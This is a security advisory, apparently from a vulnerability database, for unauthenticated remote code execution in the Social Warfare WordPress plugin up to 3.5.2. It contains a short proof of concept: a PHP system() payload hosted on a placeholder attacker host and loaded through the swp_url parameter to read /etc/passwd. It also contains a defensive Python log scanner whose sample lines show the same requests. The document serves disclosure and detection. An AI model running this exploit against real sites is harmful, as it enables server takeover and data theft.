Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE)



Description
Unauthenticated remote code execution has been discovered in the functionality that handles settings import. The import routine can be reached without authentication through the swp_debug=load_options action of wp-admin/admin-post.php; it fetches the file named by the attacker-controlled swp_url parameter and evaluates the PHP code found between <pre> tags in that file, so an unauthenticated visitor can run arbitrary commands on the web server.
Proof of Concept
1. Create a payload file and host it at a location reachable by the targeted website. Payload content: "<pre>system('cat /etc/passwd')</pre>"

2. Visit http://WEBSITE/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt

3. The content of /etc/passwd is returned in the response.
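For defenders who want to check web server logs for exploitation attempts against this issue, the following is an added Python example; it is not part of the original advisory and not code from the plugin or the researcher. It parses access-log lines in the common "combined" format and flags requests that match the pattern in step 2 above: wp-admin/admin-post.php called with swp_debug=load_options and a swp_url parameter. The swp_url host is compared against a list of hosts the site itself is allowed to import from, so a fetch from anywhere else is marked external. The log lines, IP addresses, hostnames and the trusted_hosts value are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format). The IPs are
# documentation ranges and the hostnames are placeholders, not real indicators.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Mar/2019:10:01:12 +0000] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://attacker.example/payload.txt HTTP/1.1" 200 1842 "-" "curl/7.64.0"
198.51.100.7 - - [25/Mar/2019:10:02:03 +0000] "GET /wp-admin/admin-post.php?action=save_settings HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.9 - - [25/Mar/2019:10:03:44 +0000] "GET /wp-content/plugins/social-warfare/assets/js/script.js HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Mar/2019:10:04:01 +0000] "POST /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http%3A%2F%2Fattacker.example%2Fp.txt HTTP/1.1" 200 90 "-" "python-requests/2.21"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def load_options_url(target):
    """If the request target is the settings-import debug action from the
    advisory (admin-post.php with swp_debug=load_options), return the decoded
    swp_url value (None when the parameter is missing); otherwise return None."""
    parts = urlsplit(target)
    if not parts.path.endswith('/wp-admin/admin-post.php'):
        return None
    query = parse_qs(parts.query)
    if query.get('swp_debug', [''])[0] != 'load_options':
        return None
    return query.get('swp_url', [None])[0]


def find_suspicious_requests(log_text, trusted_hosts=()):
    """Scan log text and return one finding per request that triggers the
    remote settings import. 'external' is True when the swp_url host is not
    in trusted_hosts (the hosts the site is expected to import from)."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = load_options_url(rec['target'])
        if url is None and 'swp_debug=load_options' not in rec['target']:
            continue
        host = (urlsplit(url).hostname or '') if url else ''
        findings.append({
            'ip': rec['ip'],
            'timestamp': rec['ts'],
            'method': rec['method'],
            'status': int(rec['status']),
            'swp_url': url,
            'external': host not in trusted_hosts,
        })
    return findings


if __name__ == '__main__':
    for f in find_suspicious_requests(SAMPLE_LOG, trusted_hosts=('www.example.com',)):
        flag = 'EXTERNAL' if f['external'] else 'trusted'
        print(f"{f['timestamp']} {f['ip']} {f['method']} status={f['status']} "
              f"{flag} swp_url={f['swp_url']}")
```

The match is keyed on the parameter pair rather than on a specific attacker host, so percent-encoded or POST variants of the same request are still caught, as the fourth sample line shows. Because the debug action itself should never be exercised by ordinary visitors, a hit with status 200 on an unpatched site (anything at or below 3.5.2) is worth treating as a likely compromise and following up on the server, not just blocking; the upgrade to 3.5.3 closes the hole.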

Affects Plugin

Social Warfare <= 3.5.2, fixed in version 3.5.3

References

URL: https://www.webarxsecurity.com/social-warfare-vulnerability/

Classification

Type: RCE
OWASP Top 10: A1: Injection
CWE: CWE-94

Miscellaneous

Original Researcher: Luka Sikic
Submitter: Luka Sikic
Submitter Website: https://www.webarxsecurity.com
Submitter Twitter: webarx_security
Views: 7385
Verified: No
WPVDB ID: 9259

Timeline

Publicly Published: 2019-03-25
Added: 2019-04-24
Last Updated: 2019-11-01
